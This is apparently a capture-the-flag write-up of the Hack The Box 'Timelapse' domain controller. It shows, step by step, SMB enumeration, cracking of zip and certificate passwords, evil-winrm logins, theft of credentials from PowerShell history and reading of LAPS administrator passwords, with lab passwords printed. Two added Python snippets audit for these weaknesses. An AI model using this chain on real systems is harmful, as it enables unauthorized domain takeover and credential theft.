Enumeration
First, I start with several nmap scans
┌──(kali㉿kali)-[~]
└─$ nmap -A -sV -sC -Pn 10.10.11.152
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-06 11:47 EDT
Nmap scan report for 10.10.11.152
Host is up (0.041s latency).
Not shown: 991 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-05-06 23:48:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: timelapse.htb0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 8h00m01s
| smb2-time:
| date: 2022-05-06T23:48:14
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
I continue with the UDP ports
┌──(root💀kali)-[~]
└─# nmap -sU -v 10.10.11.152 -T 4
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-06 11:48 EDT
Initiating Ping Scan at 11:48
Scanning 10.10.11.152 [4 ports]
Completed Ping Scan at 11:48, 0.11s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:48
Completed Parallel DNS resolution of 1 host. at 11:48, 0.01s elapsed
Initiating UDP Scan at 11:48
Scanning 10.10.11.152 [1000 ports]
Discovered open port 123/udp on 10.10.11.152
Discovered open port 389/udp on 10.10.11.152
Completed UDP Scan at 11:48, 17.00s elapsed (1000 total ports)
Nmap scan report for 10.10.11.152
Host is up (0.036s latency).
Not shown: 998 open|filtered udp ports (no-response)
PORT STATE SERVICE
123/udp open ntp
389/udp open ldap
and finally I scan all ports
┌──(kali㉿kali)-[~]
└─$ nmap -p- -Pn -T4 10.10.11.152
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-06 12:05 EDT
Nmap scan report for 10.10.11.152
Host is up (0.039s latency).
Not shown: 65519 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
5986/tcp open wsmans
9389/tcp open adws
49667/tcp open unknown
49673/tcp open unknown
49674/tcp open unknown
49696/tcp open unknown
63508/tcp open unknown
We can already see that this is an Active Directory domain controller: port 88 is running Kerberos (kerberos-sec) and port 389 LDAP.
SAMBA
So I connect with smbclient:
┌──(root💀kali)-[~]
└─# smbclient -L //10.10.11.152/ -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(root💀kali)-[~]
└─# smbclient -L //10.10.11.152/Shares -N
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
Shares Disk
SYSVOL Disk Logon server share
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.152 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
┌──(root💀kali)-[~]
└─# smbclient //10.10.11.152/Shares
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Oct 25 11:39:15 2021
.. D 0 Mon Oct 25 11:39:15 2021
Dev D 0 Mon Oct 25 15:40:06 2021
HelpDesk D 0 Mon Oct 25 11:48:42 2021
6367231 blocks of size 4096. 2141886 blocks available
smb: \> cd Dev
smb: \Dev\> ls
. D 0 Mon Oct 25 15:40:06 2021
.. D 0 Mon Oct 25 15:40:06 2021
winrm_backup.zip A 2611 Mon Oct 25 11:46:42 2021
6367231 blocks of size 4096. 2144130 blocks available
smb: \Dev\> get winrm_backup.zip
getting file \Dev\winrm_backup.zip of size 2611 as winrm_backup.zip (8.0 KiloBytes/sec) (average 8.0 KiloBytes/sec)
and retrieve a rather interesting file, "winrm_backup.zip"
┌──(root💀kali)-[~]
└─# unzip winrm_backup.zip
Archive: winrm_backup.zip
[winrm_backup.zip] legacyy_dev_auth.pfx password:
but it is password-protected; it is cracked fairly easily with john and rockyou:
┌──(root💀kali)-[~]
└─# zip2john winrm_backup.zip > hash.txt
ver 2.0 efh 5455 efh 7875 winrm_backup.zip/legacyy_dev_auth.pfx PKZIP Encr: TS_chk, cmplen=2405, decmplen=2555, crc=12EC5683 ts=72AA cs=72aa type=8
┌──(root💀kali)-[~]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
supremelegacy (winrm_backup.zip/legacyy_dev_auth.pfx)
1g 0:00:00:00 DONE (2022-05-06 15:39) 1.639g/s 5690Kp/s 5690Kc/s 5690KC/s surkerior..superrbd
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Once unzipped, we find a file in .pfx format
┌──(root💀kali)-[~]
└─# file legacyy_dev_auth.pfx
legacyy_dev_auth.pfx: data
When trying to export the private key, a new password is requested, not the same as the previous one
┌──(root💀kali)-[~]
└─# openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes
Enter Import Password:
Mac verify error: invalid password?
So we crack the password that will let me extract the private key
┌──(root💀kali)-[~]
└─# pfx2john legacyy_dev_auth.pfx > hash2.txt
┌──(root💀kali)-[~]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash2.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x])
Cost 1 (iteration count) is 2000 for all loaded hashes
Cost 2 (mac-type [1:SHA1 224:SHA224 256:SHA256 384:SHA384 512:SHA512]) is 1 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
thuglegacy (legacyy_dev_auth.pfx)
1g 0:00:01:02 DONE (2022-05-06 15:44) 0.01597g/s 51621p/s 51621c/s 51621C/s thugways..thugers1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
I export the private key and the SSL certificate:
openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out priv-key.pem -nodes
openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out certificate.pem
and I copy each of them into two files, key and certificate. Then I use evil-winrm to connect over SSL
┌──(root💀kali)-[~]
└─# evil-winrm -S -k key -c certificate -i 10.10.11.152
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\legacyy\Documents> whoami
timelapse\legacyy
*Evil-WinRM* PS C:\Users\legacyy\Documents>
user.txt is found on the Desktop
Privesc
I check my privileges and the users on the server
*Evil-WinRM* PS C:\Users\legacyy\Desktop> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\legacyy\Desktop> ls C:\USERS\
Directory: C:\USERS
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 10/23/2021 11:27 AM Administrator
d----- 10/25/2021 8:22 AM legacyy
d-r--- 10/23/2021 11:27 AM Public
d----- 10/25/2021 12:23 PM svc_deploy
d----- 2/23/2022 5:45 PM TRX
Nothing special so far; however, running winPEAS we notice
Directory of C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine
03/04/2022 12:46 AM 434 ConsoleHost_history.txt
1 File(s) 434 bytes
0 Dir(s) 9,216,249,856 bytes free
a .txt file containing the PowerShell command history
*Evil-WinRM* PS C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine> cat ConsoleHost_history.txt
whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
exit
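As an added example (not part of the original writeup): a small Python checker that scans a PSReadLine history file for credentials typed at the console, which is exactly how the svc_deploy password ended up on disk in ConsoleHost_history.txt. The sample history is constructed, the password is a placeholder, and a "net use" line is added to exercise the second rule.

```python
import re

# Constructed sample of a PSReadLine ConsoleHost_history.txt, modelled on the one
# found on the box; the real password is replaced by a placeholder and one extra
# "net use" line is added to exercise the second rule.
SAMPLE_HISTORY = r"""whoami
ipconfig /all
netstat -ano |select-string LIST
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
$p = ConvertTo-SecureString 'PLACEHOLDER-P@ss' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
get-aduser -filter * -properties *
net use Z: \\fs01\share /user:corp\backup Winter2021!
exit
"""

# Each rule is a label plus a regex whose named group "secret" captures the leaked value.
RULES = [
    ("ConvertTo-SecureString -AsPlainText",
     re.compile(r"ConvertTo-SecureString\s+(['\"])(?P<secret>.+?)\1.*-AsPlainText", re.I)),
    ("net use / runas with inline password",
     re.compile(r"\b(?:net\s+use|runas)\b.*?/user:\S+\s+(?P<secret>\S+)", re.I)),
    ("-Password switch with literal value",
     re.compile(r"\s-Password\s+(['\"]?)(?P<secret>[^'\"\s]+)\1", re.I)),
]

def redact(secret: str) -> str:
    """Keep only the first character and the length, so the report does not re-leak the value."""
    return secret[:1] + "*" * (len(secret) - 1)

def scan_history(text: str) -> list:
    """Return (line_number, rule_label, redacted_secret) for every line matching a rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for label, rx in RULES:
            match = rx.search(line)
            if match:
                findings.append((lineno, label, redact(match.group("secret"))))
    return findings

if __name__ == "__main__":
    for lineno, label, hint in scan_history(SAMPLE_HISTORY):
        print(f"line {lineno}: {label} -> {hint}")
```

Run it against every user's PSReadLine history on a host to find secrets that need rotating; the redacted hint is enough to identify the line without copying the secret into a report.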
So we reuse these commands:
*Evil-WinRM* PS C:\USERS> $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck
*Evil-WinRM* PS C:\USERS> $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force
*Evil-WinRM* PS C:\USERS> $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p)
From there we can check, via the same command, that we really are the user "svc_deploy", and look at its privileges
*Evil-WinRM* PS C:\USERS> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami}
timelapse\svc_deploy
*Evil-WinRM* PS C:\USERS> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {whoami /priv}
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Looking at the groups it belongs to, we see it is a member of LAPS_Readers, which will let us retrieve the admin password
*Evil-WinRM* PS C:\USERS> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {net user svc_deploy}
User name svc_deploy
Full Name svc_deploy
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 10/25/2021 12:12:37 PM
Password expires Never
Password changeable 10/26/2021 12:12:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 5/6/2022 9:40:48 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *LAPS_Readers *Domain Users
The command completed successfully.
- Pivoting
So we read the admin passwords with Get-ADComputer, requesting the ms-Mcs-AdmPwd property
*Evil-WinRM* PS C:\USERS> invoke-command -computername localhost -credential $c -port 5986 -usessl -SessionOption $so -scriptblock {Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd, ms-Mcs-AdmPwdExpirationTime}
PSComputerName : localhost
RunspaceId : 20530fed-0044-4307-a820-94ca442c0fb7
DistinguishedName : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName : dc01.timelapse.htb
Enabled : True
ms-Mcs-AdmPwd : }3}fr01+C3#2-V/-K61230fd
ms-Mcs-AdmPwdExpirationTime : 132967864456026232
Name : DC01
ObjectClass : computer
ObjectGUID : 6e10b102-6936-41aa-bb98-bed624c9b98f
SamAccountName : DC01$
SID : S-1-5-21-671920749-559770252-3318990721-1000
UserPrincipalName :
PSComputerName : localhost
RunspaceId : 20530fed-0044-4307-a820-94ca442c0fb7
DistinguishedName : CN=DB01,OU=Database,OU=Servers,DC=timelapse,DC=htb
DNSHostName :
Enabled : True
Name : DB01
ObjectClass : computer
ObjectGUID : d38b3265-230f-47ae-bdcd-f7153da7659d
SamAccountName : DB01$
SID : S-1-5-21-671920749-559770252-3318990721-1606
UserPrincipalName :
PSComputerName : localhost
RunspaceId : 20530fed-0044-4307-a820-94ca442c0fb7
DistinguishedName : CN=WEB01,OU=Web,OU=Servers,DC=timelapse,DC=htb
DNSHostName :
Enabled : True
Name : WEB01
ObjectClass : computer
ObjectGUID : 897c7cfe-ba15-4181-8f2c-a74f88952683
SamAccountName : WEB01$
SID : S-1-5-21-671920749-559770252-3318990721-1607
UserPrincipalName :
PSComputerName : localhost
RunspaceId : 20530fed-0044-4307-a820-94ca442c0fb7
DistinguishedName : CN=DEV01,OU=Dev,OU=Servers,DC=timelapse,DC=htb
DNSHostName :
Enabled : True
Name : DEV01
ObjectClass : computer
ObjectGUID : 02dc961a-7a60-4ec0-a151-0472768814ca
SamAccountName : DEV01$
SID : S-1-5-21-671920749-559770252-3318990721-1608
UserPrincipalName :
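An added example, not from the original writeup, written from the defender's side: it parses the list-format output that Get-ADComputer printed above, converts ms-Mcs-AdmPwdExpirationTime (a Windows FILETIME) to UTC and flags each host whose LAPS password is expired or not readable at all. The sample output is constructed from the records above with the password replaced by a placeholder; the expiration value is the one shown for DC01.

```python
from datetime import datetime, timedelta, timezone

# Constructed sample in the list format Get-ADComputer printed above; the LAPS password
# is a placeholder, the expiration value is the one shown for DC01. Records are
# separated by blank lines, as PowerShell prints them.
SAMPLE_OUTPUT = """\
DistinguishedName           : CN=DC01,OU=Domain Controllers,DC=timelapse,DC=htb
DNSHostName                 : dc01.timelapse.htb
ms-Mcs-AdmPwd               : PLACEHOLDER-LAPS-PASSWORD
ms-Mcs-AdmPwdExpirationTime : 132967864456026232
Name                        : DC01
SamAccountName              : DC01$

DistinguishedName           : CN=DB01,OU=Database,OU=Servers,DC=timelapse,DC=htb
Name                        : DB01
SamAccountName              : DB01$
"""

EPOCH_1601 = datetime(1601, 1, 1, tzinfo=timezone.utc)

def filetime_to_datetime(filetime: int) -> datetime:
    """A Windows FILETIME counts 100-nanosecond ticks since 1601-01-01 UTC."""
    return EPOCH_1601 + timedelta(microseconds=filetime // 10)

def parse_records(text: str) -> list:
    """Split PowerShell list-format output into one dict per blank-line-separated record."""
    records, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")
        current[key.strip()] = value.strip()
    if current:
        records.append(current)
    return records

def audit_laps(text: str, now_iso: str) -> dict:
    """Map each computer to 'not-visible' (no LAPS password readable), 'expired' or 'ok'."""
    now = datetime.fromisoformat(now_iso)  # e.g. "2022-05-06T00:00:00+00:00"
    status = {}
    for rec in parse_records(text):
        if "ms-Mcs-AdmPwd" not in rec:
            status[rec["Name"]] = "not-visible"
            continue
        expires = filetime_to_datetime(int(rec["ms-Mcs-AdmPwdExpirationTime"]))
        status[rec["Name"]] = "expired" if expires < now else "ok"
    return status
```

Hosts reported as "not-visible" either have no LAPS-managed password or are outside the caller's read permissions; "expired" means rotation is overdue and the stored password is older than policy allows.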
So we have the admin password "}3}fr01+C3#2-V/-K61230fd" for the "DC01$" computer object, i.e. the Administrator password. We connect with a new Evil-WinRM session:
┌──(kali㉿kali)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.152 -u 'Administrator' -p '}3}fr01+C3#2-V/-K61230fd' -S
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: SSL enabled
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Running whoami /priv shows that we have all privileges and that we are root